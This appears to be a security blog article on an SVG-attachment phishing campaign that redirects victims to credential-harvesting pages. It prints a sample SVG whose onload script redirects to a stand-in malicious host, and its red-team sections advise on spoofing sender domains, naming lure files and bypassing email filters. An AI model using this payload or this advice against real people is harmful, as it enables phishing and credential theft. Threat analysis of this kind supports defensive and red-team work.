In recent months, cybersecurity researchers have documented a surge in phishing attacks leveraging SVG files to bypass traditional URL-based email filters. These attacks, observed most prominently in Q3 2023, primarily targeted financial institutions and enterprise SaaS providers. The attackers, possibly linked to advanced persistent threat groups due to their intricate methods, employed SVG files attached to their emails as the delivery vehicle for malicious payloads.

This campaign stood out due to its novel deployment mechanism — the malicious SVG files contain obfuscated JavaScript designed to redirect unsuspecting users to credential-harvesting websites. According to a detailed report by SANS Internet Storm Center, the shift to SVG-based tactics represents an evolution in phishing techniques as traditional mechanisms become increasingly ineffective.

How It Was Built

SVG, or Scalable Vector Graphics, can incorporate JavaScript, turning them into potential threats when used maliciously. In this attack wave, SVG files were used as carriers for JavaScript capable of executing in some email clients and modern web browsers.

The attack begins with an email typically sent from a spoofed domain mimicking a trusted entity. The subject line reads, “Secure Document Available for Your Review,” inducing a sense of urgency and legitimacy. The email includes an SVG attachment named SecureDoc_2023.svg. Unlike traditional phishing emails, these messages do not rely on including links in the email body itself, making them harder to detect.

<svg onload="location.href='https://malicious-redirect.com/'" xmlns="http://www.w3.org/2000/svg">

  <rect width="100%" height="100%" fill="#fff"/>

  <text x="50%" y="50%" text-anchor="middle" font-size="24"

  font-family="Arial" fill="#000">Loading Document...</text>

</svg>

Upon opening the SVG file in a vulnerable environment, the embedded JavaScript executes a redirect to a phishing page masquerading as a legitimate service’s login portal. Users are prompted to input their credentials, which are then captured by the attackers for further exploitation.

Why It Worked

The success of this phishing campaign can be attributed to several tactical decisions by the threat actors:

• Spoofed Domains: The use of domains closely resembling legitimate business email addresses significantly increased trust and click-through rates among targets.
• Secure-Looking Attachments: By naming the SVG file SecureDoc_2023.svg, attackers created a façade of importance and authenticity, prompting victims to open the file out of urgency.
• JavaScript Execution in SVGs: Leveraging a lesser-known feature of SVG files allowed attackers to slip past many traditional security systems that don’t scrutinize SVG contents.

When a threat actor comprehensively understands email client quirks and user trust pathways, they can engineer a highly effective delivery vector, even without conventional URLs.

Operator Takeaways

Red team operators aiming to model realistic phishing threats should consider incorporating similar SVG-based tactics to test organizational defenses:

• Email Crafting: Invest in crafting personalized email content using sender addresses that closely imitate legitimate sources within the organization’s trusted domain list.
• SVG Execution Awareness: Educate and prepare for the strategic use of SVG files to exploit environments susceptible to embedded scripts, focusing on less-secured email and web client setups.
• Testing Diverse Endpoints: Implement testing across varied user devices and environments to ensure comprehensive coverage of exploit chain potential.

Good / Better / Best

Good: Use SVG files that are convincingly labeled to imply secure document access. Make sure that your spoofed sender domains are composed to reflect legitimate entities.

Better: Enhance the attack by incorporating knowledge of the client’s email filtering processes and permissible file types to optimize bypass techniques.

Best: Combine SVG file tactics with insider information on targeted users’ workflows, thereby crafting highly personalized and convincing phishing attempts that escalate operational impact on engagement.

References

• Understanding SVG and JavaScript in Phishing Attacks
• ThreatPost: SVG and Malware Delivery Trends

Related Reading

• What is an SVG File in the Context of Phishing?
• Leveraging SVG Files in Phishing: Techniques and Countermeasures
• Integrating Vulnerability Exploitation into Phishing Campaigns
• TeamPCP Supply Chain Campaign: Expanding Threat Vectors and Strategies

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.